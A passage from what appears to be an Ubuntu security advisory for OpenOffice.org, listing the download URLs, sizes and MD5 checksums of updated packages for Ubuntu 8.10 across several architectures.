http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-core_2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 22851682 880ca25b0132d68b4aa094cfffbc2a3b http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-dev_2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 2425676 6b183f62dcd13049656c3c7f3b51cdaa http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-draw_2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 1597462 8b8ede0294d89003b6964f0ffa37409b http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-evolution_2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 60854 850b0cfed49b8d5485aaf001ccfdcdb1 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-filter-binfilter_2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 5059622 f8a0bed278b86a10b52a876d7c2d6540 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-gnome_2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 81034 1dcfb09a4001154b4c105b64a6ff7d6f http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-gtk_2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 155504 ebf445a050898b93d62620758409581a http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-impress_2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 384382 eefc22ea00e88ab39b0a0bd2c831cf4d http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-kde_2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 155298 ccdc9d4f68c4ad8535276ae43a18ab22 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-math_2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 204416 b591186ad95b669affa8c17a4ea9a6ee http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-qa-tools_2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 230448 2be73a977a7b6ab361e32e1ef5d8d5a0 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-writer_2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 4198242 c894e4c3a3e57f3d2a361c9298f2871f http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org_2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 4974 6732d91357ee1907c0184b21e4178348 http://ports.ubuntu.com/pool/main/o/openoffice.org/python-uno_2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 104662 77c576dfe34990dead3f4ffffe2bb826 http://ports.ubuntu.com/pool/main/o/openoffice.org/ure-dbg_1.4+OOo2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 283174 c5ebc5105611c0f746b27bec4b760bdb http://ports.ubuntu.com/pool/main/o/openoffice.org/ure_1.4+OOo2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 1696320 2033f71a9159adb429fdfdf948e73248 http://ports.ubuntu.com/pool/universe/o/openoffice.org/mozilla-openoffice.org_2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 35854 76ec10e0e614cbe761159d64846b272f http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-headless_2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 278992 e46bb0fc60e6e06a6490c41ea0403c65 http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-ogltrans_2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 318710 0a0d1afa6d2256985a5800f6c7d23c89 http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-presentation-minimizer_1.0+OOo2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 595688 18fad1fc8b5380931376d8fd0ac89916 http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-sdbc-postgresql_0.7.5+OOo2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 566818 f33fe5544fe10846f6f21d6e9345abf6 Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_2.4.1-11ubuntu2.2.diff.gz Size/MD5: 96556714 6b1fc5e84667c1a89c0f20f68bb69535 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_2.4.1-11ubuntu2.2.dsc Size/MD5: 6343 7827108e62fa41ac4f7f87896836be86 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_2.4.1.orig.tar.gz Size/MD5: 278946187 4c601e202718781f5b6cf5f95c20974e Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-common_2.4.1-11ubuntu2.2_all.deb Size/MD5: 9699822 cfe3a799b987d2db5f91e85f1508365b http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-dev-doc_2.4.1-11ubuntu2.2_all.deb Size/MD5: 3296442 a059a9b34a477d52303039847db95a4a http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-emailmerge_2.4.1-11ubuntu2.2_all.deb Size/MD5: 6614 4e8b9a0d18902e9050e0ab6fb3e9e72e http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-filter-mobiledev_2.4.1-11ubuntu2.2_all.deb Size/MD5: 98178 32c630b16709ced569db14493bb53bc6 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-java-common_2.4.1-11ubuntu2.2_all.deb Size/MD5: 2679596 4ac4ea309b4e13011feddea5c802dbdc http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-in_2.4.1-11ubuntu2.2_all.deb Size/MD5: 2576 208cb1b6f242bdcb443ba5616ee2cc48 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-za_2.4.1-11ubuntu2.2_all.deb Size/MD5: 2566 cb2701ef20d71d8c750d2947d5721a82 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-style-andromeda_2.4.1-11ubuntu2.2_all.deb Size/MD5: 2768802 d709b4c3bba8a9d82da434ee06204194 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-style-crystal_2.4.1-11ubuntu2.2_all.deb Size/MD5: 3484486 91ccf7b95d41c380b1470f66b5a0f730 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-style-human_2.4.1-11ubuntu2.2_all.deb Size/MD5: 3927978 58cf6fb0c9475b4239a43824c092a865 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-style-industrial_2.4.1-11ubuntu2.2_all.deb Size/MD5: 3083014 3c77f4fce31f181c5451a1f58e4ef48c http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-style-tango_2.4.1-11ubuntu2.2_all.deb Size/MD5: 3098486 9661b83ca85e527c3bc356985eec3a52 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/ttf-opensymbol_2.4.1-11ubuntu2.2_all.deb Size/MD5: 340880 a12d12cb6aed7161d17bf6840d63a33d http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/broffice.org_2.4.1-11ubuntu2.2_all.deb Size/MD5: 88008 7a5abab4665577902424a47081d3bb65 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/libuno-cli-basetypes1.0-cil_1.0.10.0+OOo2.4.1-11ubuntu2.2_all.deb Size/MD5: 291944 d57dd5fe3590f955993eb8df4ed6b46e http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/libuno-cli-cppuhelper1.0-cil_1.0.13.0+OOo2.4.1-11ubuntu2.2_all.deb Size/MD5: 289826 23e30f905459cfda8b18e64cf5682ff5 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/libuno-cli-types1.1-cil_1.1.13.0+OOo2.4.1-11ubuntu2.2_all.deb Size/MD5: 449738 0536af224d2bbc4a0fa699c9fcf6dabe http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/libuno-cli-ure1.0-cil_1.0.13.0+OOo2.4.1-11ubuntu2.2_all.deb Size/MD5: 291028 c25d49751f29bc483a45e4ca3b56347c http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-dtd-officedocument1.0_2.4.1-11ubuntu2.2_all.deb Size/MD5: 33416 b3b8421901241baa10d241f543a4fd6a http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-qa-api-tests_2.4.1-11ubuntu2.2_all.deb Size/MD5: 1359602 ccced278c98e23c5f00e1275689c729c http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-report-builder_1.0.2+OOo2.4.1-11ubuntu2.2_all.deb Size/MD5: 212194 eaf44849ced46a2bdad07cfdf0f21a15 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-style-hicontrast_2.4.1-11ubuntu2.2_all.deb Size/MD5: 2070824 2ed0457d5de80785f82b1b0220a64226 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/libmythes-dev_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 148096 fe84cbeeaf5685cb17df358c6fba7026 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-base-core_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 534860 c77f6dbecd50ec896a81e99b5a740fb4 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-base_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 1911312 ef719069cb3c20a44a971eb04bce96ac http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-calc_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 4376834 41935b189b7e2e0f13eaf1d0f8ed2d26 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-core_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 27298398 50636b12222a99aecaec48b8c485dfda http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-dev_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 2613380 9e074bf7e844eb3d4b906752d640049d http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-draw_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 1979662 1cc2a071331307391afc5b47b0d6994e http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-evolution_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 68184 6e209ece6b82cbac5ae448b948aa3bed http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-filter-binfilter_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 6131142 bc3e27921610be3b2d79c71fdc6d1b87 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-gcj_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 2839648 ece542a195ca64f20b75f819928966e5 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-gnome_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 67848 968231c0288275717590f040b3914206 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-gtk_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 157262 0891d181989c7a32e046589dc1d81983 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-impress_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 469436 40033dc175dbbd760bf0a7ea8598873e http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-kde_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 166132 88f4ca43e28a344aa67e67927fb75b65 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-math_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 251562 dc379740a7ff923c23398b4a007c975e http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-officebean_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 47758 8632f1efb0ef7726a6a3b62f3ba6f7e8 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-report-builder-bin_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 640840 49aac60a5a414a0ac6307af9c19ac27f http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-writer_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 5345406 94d4494771e4e95733036ae2c2afb938 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 5022 c48ad4a065d41858622768679dcef2b6 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/python-uno_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 94368 cb42a5c04d280a74ad804e00d7be14d7 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/ure-dbg_1.4+OOo2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 288468 c824d7c3e80057f9b48aa4293e85cd50 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/ure_1.4+OOo2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 2396758 7625d21a9547fdcf4cc03cc1266c8196 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/cli-uno-bridge_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 24928 74de92708bda64387fb5be3b6e5e7688 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/mozilla-openoffice.org_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 31080 04bb57e3ee17f553db40143641cb114a http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-headless_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 344416 ebdcf39a99f94099b3f5f7c84381dd3d http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-presentation-minimizer_1.0+OOo2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 263452 8d93ed32372c07b82baccba0bc779297 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-qa-tools_2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 538576 49ab7f8a2224a8e0756d450b66f266ba http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-sdbc-postgresql_0.7.5+OOo2.4.1-11ubuntu2.2_amd64.deb Size/MD5: 460646 f9a0fba9877faa628525120980275129 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/libmythes-dev_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 148556 c6b4e4688dc7ce25989e3a687ac3140e http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-base-core_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 499760 c87d06d1d7e19162cb2ea4855f9d4bc7 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-base_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 1831406 27d559abc6059d13d724eb1595a2003a http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-calc_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 4116788 64cd2fd4cd2c016c5cae6db3099f68ea http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-core_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 26118918 df633b670b3e7516f8529832083eab0a http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-dev_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 2561366 8bad1840ba5cbfa00f7f2bc638acfa19 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-draw_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 1906754 29bf12010722cb31d4e9c576a5b7b076 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-evolution_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 63854 ff37786290730fc6291000c0cfb1bb2f http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-filter-binfilter_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 5827814 862f4a74d8662ad6564aa718cd3d2314 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-gcj_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 2173864 e0b91d4e6a0188cd7531107d40227022 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-gnome_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 64196 ad799248554bb9a08b5fe4780b815945 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-gtk_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 148382 5ffe22441e6d1c003c0dc32a1af4acc9 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-impress_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 451458 1665a3ad303acf015f690378aeca19ab http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-kde_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 156820 64c35c9e96406c77acdc0aef4bd2432a http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-math_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 241264 2d9325dad83d35ba3a013413d18ef50b http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-officebean_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 47602 435b42d01a0cefbb3cb3abe9590e440f http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-report-builder-bin_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 605984 95f738641b17110ebe9ebd32a9f70009 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-writer_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 5094400 c53b46e0e949b450a7488eef48e2484a http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 5016 06db5937e6ed1d02a667e60d10143166 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/python-uno_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 90900 5b5eb3a793f82589f8281da6dfaa91bc http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/ure-dbg_1.4+OOo2.4.1-11ubuntu2.2_i386.deb Size/MD5: 288664 22a8d674d5a68f96da2801d8a59c0b33 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/ure_1.4+OOo2.4.1-11ubuntu2.2_i386.deb Size/MD5: 2319828 ae9085d24582e35523ad2dd95dc89431 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/cli-uno-bridge_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 24570 5f69524baf931ceacd1f4f40573f0c6e http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/mozilla-openoffice.org_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 30306 ac52ab76fb6639100ed480d6ab6b0383 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-headless_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 337790 e75a699e659644ea9dc3bdd47d860336 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-ogltrans_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 325700 b45e5b5b30f75f49cd0cb3e660387503 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-presentation-minimizer_1.0+OOo2.4.1-11ubuntu2.2_i386.deb Size/MD5: 257646 3ccf460af7d76d3fc5d9bee0a9129822 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-qa-tools_2.4.1-11ubuntu2.2_i386.deb Size/MD5: 529500 3bc46fae95c134a6d046c6c4bcf092de http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-sdbc-postgresql_0.7.5+OOo2.4.1-11ubuntu2.2_i386.deb Size/MD5: 428374 ead00259a7840519da9c4a45a7325f5d lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/o/openoffice.org/libmythes-dev_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 148576 43a419312d7fb799cbe5f3fd3e259f8c http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-base-core_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 519894 bc6f0667d92cc59e348c340962563686 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-base_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 1889816 f4ec9bcf748289508c81b3fb5a7d87a3 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-calc_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 4177174 396a79a2b9093ae8ace083cf1c6e7752 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-core_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 26663668 834caf87b1bd13f65c0c3dabe6736f47 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-dev_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 2594714 8d1176557390d6a308ebc3776341306c http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-draw_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 1954460 22499acadb7beaaff925f236c720c19d http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-evolution_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 64726 865d88c5a5c2c64f581e85ee63d3305d http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-filter-binfilter_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 5909776 7a60298986223882590dcd63f49bbc61 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-gcj_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 2362672 92ea54da2d5c5c72c74ea325d5b65bff http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-gnome_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 65430 df55c2ec7bb20021d72181bf37ee7e5f http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-gtk_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 150748 62589ba8ce1bddaaa4561f0e6d72ed85 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-impress_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 462376 e3d2639b25e9f885fe10187f6fd1f473 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-kde_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 158552 179ae1cb22e333da0ff458492dc07684 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-math_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 243478 79e139bf2748f723800ad09adcb357ce http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-officebean_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 47584 ef25705dbb9e89be15370746a87766b4 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-report-builder-bin_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 629654 eaf37a785fe40667b7290ba39c3201e8 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-writer_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 5198874 1dcee9c3d3b39a18776c8d782acee83a http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 5022 939c959ad324d8bcb8b4adfbeeda57b7 http://ports.ubuntu.com/pool/main/o/openoffice.org/python-uno_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 93202 d9657c5749786cb7031b06800d78fe4e http://ports.ubuntu.com/pool/main/o/openoffice.org/ure-dbg_1.4+OOo2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 288686 98ba9cee532d10d203b640b70108def4 http://ports.ubuntu.com/pool/main/o/openoffice.org/ure_1.4+OOo2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 2352480 e05ce4df994899c6791c14b8e27501db http://ports.ubuntu.com/pool/universe/o/openoffice.org/cli-uno-bridge_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 24572 e9e83897e3f83c97e6860e804f1daaf0 http://ports.ubuntu.com/pool/universe/o/openoffice.org/mozilla-openoffice.org_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 30540 a0dfc1dfd4a27f907a5f8fc5bb3ee087 http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-headless_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 359934 fd96160e93a9289b9f45c518b534377f http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-ogltrans_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 326550 d0309e22109b30c4070437a3da4c95b2 http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-presentation-minimizer_1.0+OOo2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 263422 ec736933c36f8932876a330a5ff53a27 http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-qa-tools_2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 534638 99980e10a68c1987992c196ac595efd0 http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-sdbc-postgresql_0.7.5+OOo2.4.1-11ubuntu2.2_lpia.deb Size/MD5: 436944 f05e03c5361b7f89e70c3734e016880f powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/o/openoffice.org/libmythes-dev_2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 148592 4b193d2b5a3d49c90a0d6e9628e8247b http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-base-core_2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 369822 1fd9b4692741e0d6f1b0e9002ce65a1d http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-base_2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 1265230 ff6525dde918647ba17349698bf30e21 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-calc_2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 3179346 e050a0d2773579509b731d1bc28d3441 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-core_2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 21129032 9e73fbfb801f3eaea97c598e603e880f http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-dev_2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 2231622 cb6f8b4a4bd885c025929e5b6437d206 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-draw_2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 1468218 3006afe523e76e471fe0dbe48c3cf5ac http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-evolution_2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 58382 ba6ce47fa5b329366c290a43bc003cad http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-filter-binfilter_2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 4751028 b610a94e9f2469725e2904fe56c5a02d http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-gnome_2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 63016 4c08599d20f4179bf94752294a8caa68 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-gtk_2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 133530 3ba444ec8510cf2b51dcba6d6bb3cdc2 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-impress_2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 339838 4f4be152340d12941def5889fbc29fe3 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-kde_2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 137482 5ebd91e0f3656980eb23f91856dbeb12 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-math_2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 197006 83dc9d9735b03139b3e2c31ed71b54ce http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-writer_2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 3986368 ca26fb978aceeb79e9620a90e0fb55e7 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org_2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 4962 79793e51aada7119bd917b982408d5ae http://ports.ubuntu.com/pool/main/o/openoffice.org/python-uno_2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 86844 48f370f215bd10b89974049d6e930d9d http://ports.ubuntu.com/pool/main/o/openoffice.org/ure-dbg_1.4+OOo2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 288656 bdd7e51513a5aa05f0fa1fdcf6dee3e4 http://ports.ubuntu.com/pool/main/o/openoffice.org/ure_1.4+OOo2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 1641998 4037ae6b41632b3aa8d525b4a586b397 http://ports.ubuntu.com/pool/universe/o/openoffice.org/mozilla-openoffice.org_2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 29850 06adafa4a4dac532c0e854a238e03129 http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-headless_2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 210860 1ef1e12ee481e9d4dfae10c81df99bc6 http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-ogltrans_2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 320882 4dcfc85a0891910780c098f72eecba69 